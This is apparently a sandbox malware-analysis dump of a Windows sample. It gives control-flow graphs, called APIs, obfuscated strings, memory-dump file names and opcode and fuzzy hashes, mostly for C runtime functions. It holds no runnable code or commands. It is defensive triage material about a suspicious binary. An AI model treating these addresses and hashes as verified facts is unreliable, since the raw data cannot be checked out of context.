                                                                                                                                              control_flow_graph 144 4171e6-4171ed 145 4171f0-417200 144->145 146 417202 145->146 147 417208-41720b 145->147 146->147 147->145 148 41720d-41722e LoadLibraryW call 416bd0 call 416e20 147->148 153 417230-417237 148->153 154 417239-417247 LocalAlloc GetStdHandle MoveFileA 153->154 155 41724d-417253 153->155 154->155 156 417255 call 416bc0 155->156 157 41725a-417261 155->157 156->157 159 417270-417277 157->159 160 417263-41726a InterlockedDecrement 157->160 159->153 161 417279-417289 159->161 160->159 162 417290-4172a0 161->162 163 4172a2-4172a7 GetFileAttributesW 162->163 164 4172a9-4172ac 162->164 163->164 164->162 165 4172ae-4172b9 164->165 166 4172c0-4172c5 165->166 167 4172c7-4172cd 166->167 168 4172cf-4172d5 166->168 167->168 169 4172d7-4172e4 call 401000 167->169 168->166 168->169
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(gavosebisiv), ref: 00417212
                                                                                                                                              • LocalAlloc.KERNEL32(00000000,00000000), ref: 0041723D
                                                                                                                                              • GetStdHandle.KERNEL32(00000000), ref: 00417241
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00417247
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041726A
                                                                                                                                              • GetFileAttributesW.KERNEL32(wumefalijocenor), ref: 004172A7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesDecrementHandleInterlockedLibraryLoadLocalMove
                                                                                                                                              • String ID: gavosebisiv$k`$wumefalijocenor$}$
                                                                                                                                              • API String ID: 1531786347-1394638211
                                                                                                                                              • Opcode ID: f6b0d768e54f3586a25f5644e230000ed906063f711a6d0ff0fff656b7445972
                                                                                                                                              • Instruction ID: bc3d966121456f33088ba0261fb492972a46eee307fae20126fe30775f8c93fb
                                                                                                                                              • Opcode Fuzzy Hash: f6b0d768e54f3586a25f5644e230000ed906063f711a6d0ff0fff656b7445972
                                                                                                                                              • Instruction Fuzzy Hash: 862123349482148BCB349B60DC467DABB70FB58315F1244AFEA4997290CA3C5CD98799

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 172 4053e4-4053ff call 4027b0 call 40358a 177 405401-405405 172->177 178 40541e-405436 call 401cb7 172->178 177->178 180 405407 177->180 185 405438-40543a 178->185 186 40546e-40547a call 40547f 178->186 182 40540a-40540c 180->182 183 405416-40541d call 4027f5 182->183 184 40540e-405415 call 4013d4 182->184 184->183 190 405456-405468 InterlockedIncrement 185->190 191 40543c-405445 InterlockedDecrement 185->191 186->182 190->186 191->190 195 405447-40544d 191->195 195->190 196 40544f-405455 call 403235 195->196 196->190
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 004053F0
                                                                                                                                                • Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
                                                                                                                                                • Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00405410
                                                                                                                                              • __lock.LIBCMT ref: 00405420
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040543D
                                                                                                                                              • InterlockedIncrement.KERNEL32(005D2AE0), ref: 00405468
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                              • String ID: *]
                                                                                                                                              • API String ID: 4271482742-2659218941
                                                                                                                                              • Opcode ID: be58af24912cd6c62917008193cc0147a3d24d1c6f0f0b7415779849656b3a0e
                                                                                                                                              • Instruction ID: 70f83e997a8f96629d46cfa3be9f97651ca90acd5da0dd3ef1863481fd68f2a0
                                                                                                                                              • Opcode Fuzzy Hash: be58af24912cd6c62917008193cc0147a3d24d1c6f0f0b7415779849656b3a0e
                                                                                                                                              • Instruction Fuzzy Hash: 5B017C31900A21A7C720AF2598057DB77A4EB04752F15803BE810B36D1CB3CA981CFDD

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 209 403235-403246 call 4027b0 212 403248-40324f 209->212 213 4032bd-4032c2 call 4027f5 209->213 215 403251-403269 call 401cb7 call 401cea 212->215 216 403294 212->216 227 403274-403284 call 40328b 215->227 228 40326b-403273 call 401d1a 215->228 219 403295-4032a5 HeapFree 216->219 219->213 221 4032a7-4032bc call 4019d4 GetLastError call 401992 219->221 221->213 227->213 234 403286-403289 227->234 228->227 234->219
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 00403253
                                                                                                                                                • Part of subcall function 00401CB7: __mtinitlocknum.LIBCMT ref: 00401CCD
                                                                                                                                                • Part of subcall function 00401CB7: __amsg_exit.LIBCMT ref: 00401CD9
                                                                                                                                                • Part of subcall function 00401CB7: EnterCriticalSection.KERNEL32(?,?,?,00401A9E,00000004,004194B8,0000000C,00401029,?,?,00000000), ref: 00401CE1
                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 0040325E
                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 0040326D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,004194F8,0000000C,0040357B,00000000,?,0040485B,?,00000001,?,?,00401C41,00000018,004194D8,0000000C), ref: 0040329D
                                                                                                                                              • GetLastError.KERNEL32(?,0040485B,?,00000001,?,?,00401C41,00000018,004194D8,0000000C,00401CD2,?,?,?,00401A9E,00000004), ref: 004032AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                              • Opcode ID: 366d77674f76aa2fb5ae094a41afa686f242d560b984fb5c48cef40d5ec03190
                                                                                                                                              • Instruction ID: 3d99899fb7fca7c9bbd17d8fbefa29218a77877265686fb0b1ca7e502e1f4026
                                                                                                                                              • Opcode Fuzzy Hash: 366d77674f76aa2fb5ae094a41afa686f242d560b984fb5c48cef40d5ec03190
                                                                                                                                              • Instruction Fuzzy Hash: 2101A771945305AADB206F72AC0AB9E7F68AF01319F20417FF404B71D0DB3C8644DA5C

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 235 407e9d-407eae 236 407eb0-407eb3 235->236 237 407ec5 235->237 236->237 238 407eb5-407eb7 236->238 239 407ec7-407eca 237->239 240 407eb9-407ebe 238->240 241 407ecb-407edc call 402be7 238->241 240->237 242 407ec0-407ec2 240->242 245 407efd-407f0e call 406d80 241->245 246 407ede-407ee3 241->246 242->237 253 407f10-407f1c 245->253 254 407f8d-407fac MultiByteToWideChar 245->254 248 407ee5-407ee9 246->248 249 407eec-407eef 246->249 248->249 250 407ef1-407ef4 249->250 251 407ef8-407efb 249->251 250->251 251->239 256 407f43-407f4c 253->256 257 407f1e-407f21 253->257 254->249 255 407fb2 254->255 258 407f6e-407f7c call 4019d4 255->258 256->258 260 407f4e-407f51 256->260 257->256 259 407f23-407f41 MultiByteToWideChar 257->259 265 407f85-407f88 258->265 266 407f7e-407f81 258->266 259->256 261 407f53-407f5c 259->261 260->258 260->261 261->239 263 407f62-407f69 261->263 263->239 265->239 266->265
                                                                                                                                              APIs
                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00407ED1
                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00407F05
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00407F36
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00407FA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                              • Opcode ID: e2cc34738d9ced17f9a8eed5ebd4bff17b00d4116af52a48d61af0889a0423cf
                                                                                                                                              • Instruction ID: 14c4ee2ed5b55191a4487f164104f5e3dea6c597eb3c288a55b3f11bb562f33e
                                                                                                                                              • Opcode Fuzzy Hash: e2cc34738d9ced17f9a8eed5ebd4bff17b00d4116af52a48d61af0889a0423cf
                                                                                                                                              • Instruction Fuzzy Hash: C331E431E09246EFCB20DF64C8809AE3BA5BF01311F1445BAE465AB2D1D734ED41DB9A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 267 416e20-416e47 268 416e49-416e54 QueryDosDeviceA 267->268 269 416e5a 267->269 268->269 270 416e5f call 416d70 269->270 271 416e64-416e6b 270->271 272 416e75-416e8a call 416db0 271->272 273 416e6d-416e6f FreeEnvironmentStringsW 271->273 276 416ea3-416ea6 272->276 277 416e8c-416e9d HeapDestroy GetNumaProcessorNode 272->277 273->272 278 416ea8 call 401000 276->278 277->276 279 416ead-416eb0 278->279
                                                                                                                                              APIs
                                                                                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416E54
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00416E6F
                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00416E8E
                                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00416E9D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4159173863-0
                                                                                                                                              • Opcode ID: 8854b8bbace8555cc0f419f014975356daebfdb9637a94b94a70e4625fe11a51
                                                                                                                                              • Instruction ID: 37e889f167100b587a02f92b955e498922163858d7d7aab38356b1d4f56091a8
                                                                                                                                              • Opcode Fuzzy Hash: 8854b8bbace8555cc0f419f014975356daebfdb9637a94b94a70e4625fe11a51
                                                                                                                                              • Instruction Fuzzy Hash: 3401D474640308ABC760EB64EC45BDA7BB8E71C319F01416AF70997290DE349D88CBA9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 280 405b50-405b6b call 4027b0 call 40358a 285 405b6d-405b71 280->285 286 405b8f-405bb8 call 401cb7 call 405b12 call 405bba 280->286 285->286 288 405b73-405b78 call 40358a 285->288 294 405b7b-405b7d 286->294 288->294 296 405b87-405b8e call 4027f5 294->296 297 405b7f-405b86 call 4013d4 294->297 297->296
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 00405B5C
                                                                                                                                                • Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
                                                                                                                                                • Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A
                                                                                                                                              • __getptd.LIBCMT ref: 00405B73
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00405B81
                                                                                                                                              • __lock.LIBCMT ref: 00405B91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3521780317-0
                                                                                                                                              • Opcode ID: 9b9d6a13feb519881675422f27fd5dda9ba886e3a5a69f4c1691289f93b848f8
                                                                                                                                              • Instruction ID: 552e8b1d8a98d21b991217d94812f4f783b0b0706fbbf1442b474227e8c06dbd
                                                                                                                                              • Opcode Fuzzy Hash: 9b9d6a13feb519881675422f27fd5dda9ba886e3a5a69f4c1691289f93b848f8
                                                                                                                                              • Instruction Fuzzy Hash: C2F06231A01B009AD620BB668806BAA73B0EB00724F10413FE840B72D1CBBCB901DE5E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 303 407c29-407c34 304 407c36-407c3b 303->304 305 407c3d-407c3f 303->305 306 407c43 304->306 307 407c41 305->307 308 407c48-407c4a 305->308 306->308 307->306 309 407c4b call 40488f 308->309 310 407c50-407c59 309->310 311 407c79-407c80 310->311 312 407c5b-407c5e 310->312 314 407c87-407c96 311->314 313 407c64 call 40488f 312->313 315 407c69-407c72 313->315 316 407c82 314->316 317 407c98-407ca2 314->317 315->311 318 407c74-407c78 315->318 316->314 319 407ca3-407cbd 317->319 320 407cc7 319->320 321 407cbf-407cc1 319->321 323 407cc9-407cd3 320->323 321->320 322 407cc3-407cc5 321->322 322->320 322->323 323->319 324 407cd5-407cd9 323->324
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __calloc_crt
                                                                                                                                              • String ID: @.Q
                                                                                                                                              • API String ID: 3494438863-2561686684
                                                                                                                                              • Opcode ID: d191732e1c4f999118ae73ad3d6cb9ca27644a56187a4761f745d30067acc614
                                                                                                                                              • Instruction ID: 3abb8ef269fb54cc31cb530c16d7acece676a1df543f4bc4756426e38cd875f9
                                                                                                                                              • Opcode Fuzzy Hash: d191732e1c4f999118ae73ad3d6cb9ca27644a56187a4761f745d30067acc614
                                                                                                                                              • Instruction Fuzzy Hash: 36112771B0C61157F3284B2DBC106E5279AE798724B24823FE601EB3D0EB7CEC81468D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 325 416bd0-416d10 GetModuleHandleW GetProcAddress
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00512CE8), ref: 00416CAF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0041D210), ref: 00416CEC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              • Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1646373207-3916222277
                                                                                                                                              • Opcode ID: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
                                                                                                                                              • Instruction ID: d8462089c25fc9d344aee2fc6fb1be1e63980dafba0cd980b71d8e6a5f25c2b5
                                                                                                                                              • Opcode Fuzzy Hash: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
                                                                                                                                              • Instruction Fuzzy Hash: C331285095C380D9E301CBB8FC047853F61AB39708F04C1A89658873B5D7BE9A69D7AE

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:1395
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 5399 403ce1 5400 403ce4 5399->5400 5403 40602a 5400->5403 5404 406050 5403->5404 5405 406049 5403->5405 5415 403ebd 5404->5415 5406 4029cc __NMSG_WRITE 67 API calls 5405->5406 5406->5404 5409 406139 5411 40165a _abort 67 API calls 5409->5411 5414 406140 5411->5414 5412 406061 _memset 5412->5409 5413 4060f9 SetUnhandledExceptionFilter UnhandledExceptionFilter 5412->5413 5413->5409 5416 40333e __decode_pointer 6 API calls 5415->5416 5417 403ec8 5416->5417 5417->5412 5418 403eca 5417->5418 5424 403ed6 __locking 5418->5424 5419 403f32 5420 403f13 5419->5420 5423 403f41 5419->5423 5425 40333e __decode_pointer 6 API calls 5420->5425 5421 403efd 5422 403511 __getptd_noexit 67 API calls 5421->5422 5428 403f02 _siglookup 5422->5428 5426 4019d4 __set_error_mode 67 API calls 5423->5426 5424->5419 5424->5420 5424->5421 5427 403ef9 5424->5427 5425->5428 5429 403f46 5426->5429 5427->5421 5427->5423 5430 403fa8 5428->5430 5432 40165a _abort 67 API calls 5428->5432 5438 403f0b __locking 5428->5438 5431 403997 __set_error_mode 6 API calls 5429->5431 5433 401cb7 __lock 67 API calls 5430->5433 5435 403fb3 5430->5435 5431->5438 5432->5430 5433->5435 5434 403335 __init_pointers 6 API calls 5436 403fe8 5434->5436 5435->5434 5435->5436 5439 40403e 5436->5439 5438->5412 5440 404044 5439->5440 5441 40404b 5439->5441 5443 401bdd LeaveCriticalSection 5440->5443 5441->5438 5443->5441 5587 406021 5588 4013d4 __amsg_exit 67 API calls 5587->5588 5589 406028 5588->5589 5467 401882 5470 40472b 5467->5470 5469 401887 5469->5469 5471 404750 5470->5471 5472 40475d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 5470->5472 5471->5472 5473 404754 5471->5473 5472->5473 5473->5469 5096 401843 5097 401852 5096->5097 5098 401858 5096->5098 5102 40165a 5097->5102 5105 40167f 5098->5105 5101 40185d __locking 5103 401518 _doexit 67 API calls 5102->5103 5104 40166b 5103->5104 5104->5098 5106 401518 _doexit 67 API calls 5105->5106 5107 40168a 5106->5107 5107->5101 5474 405504 5484 405488 5474->5484 5477 40552f setSBCS 5478 401000 setSBUpLow 5 API calls 5477->5478 5479 4056e7 5478->5479 5480 405573 IsValidCodePage 5480->5477 5481 405585 GetCPInfo 5480->5481 5481->5477 5483 405598 _memset __setmbcp_nolock 5481->5483 5491 405251 GetCPInfo 5483->5491 5485 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 5484->5485 5486 40549c 5485->5486 5487 4054c5 5486->5487 5488 4054a7 GetOEMCP 5486->5488 5489 4054ca GetACP 5487->5489 5490 4054b7 5487->5490 5488->5490 5489->5490 5490->5477 5490->5480 5490->5483 5492 405337 5491->5492 5493 405285 _memset 5491->5493 5497 401000 setSBUpLow 5 API calls 5492->5497 5494 4069ab ___crtGetStringTypeA 91 API calls 5493->5494 5495 4052f2 5494->5495 5501 4067ac 5495->5501 5499 4053e2 5497->5499 5499->5483 5500 4067ac ___crtLCMapStringA 102 API calls 5500->5492 5502 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 5501->5502 5503 4067bf 5502->5503 5506 406407 5503->5506 5507 406428 LCMapStringW 5506->5507 5510 406443 5506->5510 5508 40644b GetLastError 5507->5508 5507->5510 5508->5510 5509 406641 5514 406dfc ___ansicp 91 API calls 5509->5514 5510->5509 5511 40649d 5510->5511 5512 406638 5511->5512 5513 4064b6 MultiByteToWideChar 5511->5513 5515 401000 setSBUpLow 5 API calls 5512->5515 5513->5512 5521 4064e3 5513->5521 5516 406669 5514->5516 5517 405312 5515->5517 5516->5512 5518 406682 5516->5518 5519 40675d LCMapStringA 5516->5519 5517->5500 5522 406e45 ___convertcp 74 API calls 5518->5522 5532 4066b9 5519->5532 5520 406534 MultiByteToWideChar 5523 40654d LCMapStringW 5520->5523 5550 40662f 5520->5550 5524 4064fc __alloca_probe_16 5521->5524 5525 40109e _malloc 67 API calls 5521->5525 5526 406694 5522->5526 5527 40656e 5523->5527 5523->5550 5524->5512 5524->5520 5525->5524 5526->5512 5529 40669e LCMapStringA 5526->5529 5533 406577 5527->5533 5534 4065a0 5527->5534 5528 403235 ___convertcp 67 API calls 5531 406784 5528->5531 5529->5532 5537 4066c0 5529->5537 5530 406141 ___convertcp 67 API calls 5530->5512 5531->5512 5535 403235 ___convertcp 67 API calls 5531->5535 5532->5528 5532->5531 5536 406589 LCMapStringW 5533->5536 5533->5550 5539 40109e _malloc 67 API calls 5534->5539 5544 4065bb __alloca_probe_16 5534->5544 5535->5512 5536->5550 5540 4066d1 _memset __alloca_probe_16 5537->5540 5541 40109e _malloc 67 API calls 5537->5541 5538 4065ef LCMapStringW 5542 406607 WideCharToMultiByte 5538->5542 5543 406629 5538->5543 5539->5544 5540->5532 5546 40670f LCMapStringA 5540->5546 5541->5540 5542->5543 5545 406141 ___convertcp 67 API calls 5543->5545 5544->5538 5544->5550 5545->5550 5547 40672b 5546->5547 5548 40672f 5546->5548 5552 406141 ___convertcp 67 API calls 5547->5552 5551 406e45 ___convertcp 74 API calls 5548->5551 5550->5530 5551->5547 5552->5532 5590 4035a4 5591 4035b0 __locking 5590->5591 5592 4035c8 5591->5592 5593 403235 ___convertcp 67 API calls 5591->5593 5595 4036b2 __locking 5591->5595 5594 4035d6 5592->5594 5596 403235 ___convertcp 67 API calls 5592->5596 5593->5592 5597 403235 ___convertcp 67 API calls 5594->5597 5601 4035e4 5594->5601 5596->5594 5597->5601 5598 403235 ___convertcp 67 API calls 5600 4035f2 5598->5600 5599 403600 5603 40360e 5599->5603 5604 403235 ___convertcp 67 API calls 5599->5604 5600->5599 5602 403235 ___convertcp 67 API calls 5600->5602 5601->5598 5601->5600 5602->5599 5605 40361c 5603->5605 5607 403235 ___convertcp 67 API calls 5603->5607 5604->5603 5606 40362d 5605->5606 5608 403235 ___convertcp 67 API calls 5605->5608 5609 401cb7 __lock 67 API calls 5606->5609 5607->5605 5608->5606 5610 403635 5609->5610 5611 403641 InterlockedDecrement 5610->5611 5612 40365a 5610->5612 5611->5612 5613 40364c 5611->5613 5626 4036be 5612->5626 5613->5612 5616 403235 ___convertcp 67 API calls 5613->5616 5616->5612 5617 401cb7 __lock 67 API calls 5618 40366e 5617->5618 5619 40369f 5618->5619 5620 405a79 ___removelocaleref 8 API calls 5618->5620 5629 4036ca 5619->5629 5624 403683 5620->5624 5623 403235 ___convertcp 67 API calls 5623->5595 5624->5619 5625 4058a1 ___freetlocinfo 67 API calls 5624->5625 5625->5619 5632 401bdd LeaveCriticalSection 5626->5632 5628 403667 5628->5617 5633 401bdd LeaveCriticalSection 5629->5633 5631 4036ac 5631->5623 5632->5628 5633->5631 5553 401b86 5554 401b96 5553->5554 5555 401ba2 DeleteCriticalSection 5554->5555 5556 401bba 5554->5556 5557 403235 ___convertcp 67 API calls 5555->5557 5558 401bda 5556->5558 5559 401bcc DeleteCriticalSection 5556->5559 5557->5554 5559->5556 5444 416ae6 5445 416af0 LoadLibraryW 5444->5445 5447 4164d0 2 API calls 5445->5447 5448 416b1d 5447->5448 5449 416720 13 API calls 5448->5449 5450 416b22 5449->5450 5451 416b39 LocalAlloc GetStdHandle MoveFileA 5450->5451 5452 416b63 InterlockedDecrement 5450->5452 5453 416b79 5450->5453 5451->5450 5452->5450 5454 416ba2 GetFileAttributesW 5453->5454 5455 416bae 5453->5455 5454->5453 5456 401000 setSBUpLow 5 API calls 5455->5456 5457 416be1 5456->5457 5560 404107 5561 404143 5560->5561 5562 404119 5560->5562 5562->5561 5564 403cbd 5562->5564 5565 403cc9 __locking 5564->5565 5566 40358a __getptd 67 API calls 5565->5566 5567 403cce 5566->5567 5568 40602a _abort 69 API calls 5567->5568 5569 403cf0 __locking 5568->5569 5569->5561 5634 404d28 5635 404d3a 5634->5635 5637 404d48 @_EH4_CallFilterFunc@8 5634->5637 5636 401000 setSBUpLow 5 API calls 5635->5636 5636->5637 5108 404149 SetUnhandledExceptionFilter 5638 407c29 5639 407c36 5638->5639 5640 40488f __calloc_crt 67 API calls 5639->5640 5641 407c50 5640->5641 5642 40488f __calloc_crt 67 API calls 5641->5642 5643 407c69 5641->5643 5642->5643 5109 40584a 5112 401bdd LeaveCriticalSection 5109->5112 5111 405851 5112->5111 5644 40182f 5647 403d08 5644->5647 5648 403511 __getptd_noexit 67 API calls 5647->5648 5649 401840 5648->5649 5113 4062d0 RtlUnwind 5570 402810 5571 402849 5570->5571 5572 40283c 5570->5572 5574 401000 setSBUpLow 5 API calls 5571->5574 5573 401000 setSBUpLow 5 API calls 5572->5573 5573->5571 5580 402859 __except_handler4 __IsNonwritableInCurrentImage 